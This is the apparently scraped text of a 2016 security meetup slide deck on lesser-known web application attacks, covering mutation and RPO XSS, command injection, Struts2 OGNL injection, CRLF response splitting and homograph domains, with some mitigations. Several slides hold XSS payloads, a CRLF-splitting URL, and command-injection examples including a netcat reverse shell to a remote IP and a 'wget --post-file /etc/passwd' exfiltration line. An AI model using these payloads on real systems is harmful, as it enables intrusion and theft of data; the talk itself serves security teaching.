Null 14 may_lesser_known_attacks_by_ninadsarang
•
1 j'aime•1,605 vues
Lesser known web application attacks presented at Mumbai null meet 14 May 2016.
Recommandé
Recommandé
Contenu connexe
Tendances
Tendances (12)
En vedette
En vedette (11)
Similaire à Null 14 may_lesser_known_attacks_by_ninadsarang
Similaire à Null 14 may_lesser_known_attacks_by_ninadsarang (20)
Dernier
Dernier (20)
Null 14 may_lesser_known_attacks_by_ninadsarang
- 2. LesserKnownWebAppAttacks About me Consultant atAujas Networks Part time bug hunter Individual Security researcher Blogger http://infinite8security.blogspot.in
- 3. LesserKnownWebAppAttacks Menu Card Cross site scripting – Mutation XSS RPO XSS Zombie XSS Remote Command Execution CR-LF Attack Homograph Attack
- 4. It’s all about PoPuP LesserKnownWebAppAttacks Cross site Scripting- Mutation XSS
- 5. LesserKnownWebAppAttacks HTML encoded payload <listing><img src=1 onerror=alert(1)></listing> we will put this piece of code into another code using innerHTML property. <listing id=x><img src=1 onerror=alert(1)></listing> <script>alert(document.getElementById('x').innerHTML)</script> When this code will execute, browser will read innerHTML and call document.getElementById(‘x’) Resulting in multiple level of decoding and mutate from safe to unsafe state.
- 8. LesserKnownWebAppAttacks Mitigation: Server-side mitigation • Avoiding outputting server content otherwise incorrectly converted by the browser. • The flawed content should be replaced with semantically equivalent content which is converted properly by the browser. Client-side mitigation • Browsers should implement ECMA Script 5 and higher. • TrueHTML: TrueHTML relies on the XMLSerializer DOM object provided by all of the user agents. • https://cure53.de/fp170.pdf
- 9. LesserKnownWebAppAttacks Cross site Scripting- RPO XSS Relative path Overwrite xss • Difference between Absolute and Relative url • Absolute URL: https://thehacker.co.in/test • Relative URL: test/some_subdirectory To exploit this findings three things are necessary, 1) stored XSS that allows CSS injection. 2) URL Rewriting. 3) Relative addressing to CSS style sheet.
- 10. LesserKnownWebAppAttacks D E M O • Step 1: Lets visit www.webdevelopersnotes.com/graphics/index.php3 • To check URL re-writing add ‘/’ • Open re-writed url with xss payloadin IE and see the Magic ;) • http://challenge.hackvertor.co.uk/ xss_horror_show/chapter7/rpo.php/ Mitigation: • It is recommended that absolute URLs should be used throughout a site. • Otherwise relative root url should be used.
- 12. LesserKnownWebAppAttacks Cross site Scripting- Zombie XSS
- 14. www.nsa.gov && nc -vn 192.168.254.128 4444 -e /bin/bash Remote/OS Command Execution LesserKnownWebAppAttacks
- 15. LesserKnownWebAppAttacks Now what if ( ; ) is blocked by the application? X ;Y = Seperating Commands (Run X and then Y, regardless of success of X) X |Y = PIPE (Run X and pass output of X toY) X ^Y = PIPEZ X &&Y =AND (RunYif X succeeded ) FAIL||Y = OR (RunYif X failed) X %0D Y%0D Z = OR ` X ` = Backtick ` X &Y` = Background (RunYand then run X in background, regardless of success of X) $( command ) nc -e /bin/sh = Netcat wget --post-file /etc/passwd = WGET
- 16. LesserKnownWebAppAttacks RCE never dies!!! • "action:", "redirect:" or "redirectAction:" is not properly sanitized. • information will be evaluated as OGNL (Object-Graph Navigation Language) expression against the value stack, this introduces the possibility to inject server side code. Apache struts2 RCE http://host/struts2- blank/example/X.action?action:${3*4}
- 18. LesserKnownWebAppAttacks Divide and Conquer cR-LFAttack • CR stands for Carriage Return (CR,ASCII 13, r) • LF stands for Line feed (LF, ASCII 10, n) How this Attack work? The server script embeds user data in HTTP response headers. Example: Step1: There is redirection page “redir_lang.jsp” When we hit index page server responds with following response <% response.sendRedirect("/by_lang.jsp?lang="+ request.getParameter("lang")); %>
- 19. LesserKnownWebAppAttacks Divide and Conquer cR-LFAttack
- 20. LesserKnownWebAppAttacks Lets Attack ;) Step 3: Instead of passing value as English. Lets pass our attack vector as shown. /redir_lang.jsp?lang=foobar%0d%0aContentLength :%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aCont entType:%20text/html%0d%0aContentLength:%2019% 0d%0a%0d%0a<html>Shazam</html> Note: We have URLencoded the CRLF sequences Lets see what server responds with
- 21. LesserKnownWebAppAttacks A first HTTP response, which is a 302 (redirection) response. A second HTTP response, which is a 200 response, with a content comprising of 19 bytes of HTML. Superfluous data
- 22. So when the attacker feeds the target with two requests, the first being to the URL /redir_lang.jsp?lang=foobar%0d%0aContentLength:%200%0d%0a%0d% 0aHTTP/1.1%20200%20OK%0d%0aContentType:%20text/html%0d%0aCont entLength:%2019%0d%0a%0d%0a<html>Shazam</html> And the second to the URL > /index.html The target would believe that the first request is matched to the first response: And the second request (to /index.html) is matched to the second response: LesserKnownWebAppAttacks
- 23. What Attacker can do by CRLF attack? Cross site scripting >> http://blog.innerht.ml/twitter-crlf-injection Web Cache Poisoning (defacement) Cross User attacks (single user, single page, temporary defacement) Hijacking pages with user-specific information Browser cache poisoning LesserKnownWebAppAttacks
- 24. LesserKnownWebAppAttacks Homograph Attack Can you tell the difference? 1) https://ebаy.com/ 2) https://ebay.com/
- 26. LesserKnownWebAppAttacks What is this all about? http://ebаy.com/ Decoding to punycode http://xn--eby-7cd.com/ Cyrillic alphabets
- 27. LesserKnownWebAppAttacks What Attacker can do by Homograph attack? Phishing Un-validated Redirection Fake websites Attacker may combine this with SSLattacks http://www.blackhat.com/presentations/bh-dc- 09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf
- 29. Thank You Reach me @ LinkedIn: Ninad Sarang Twitter: @hbkninad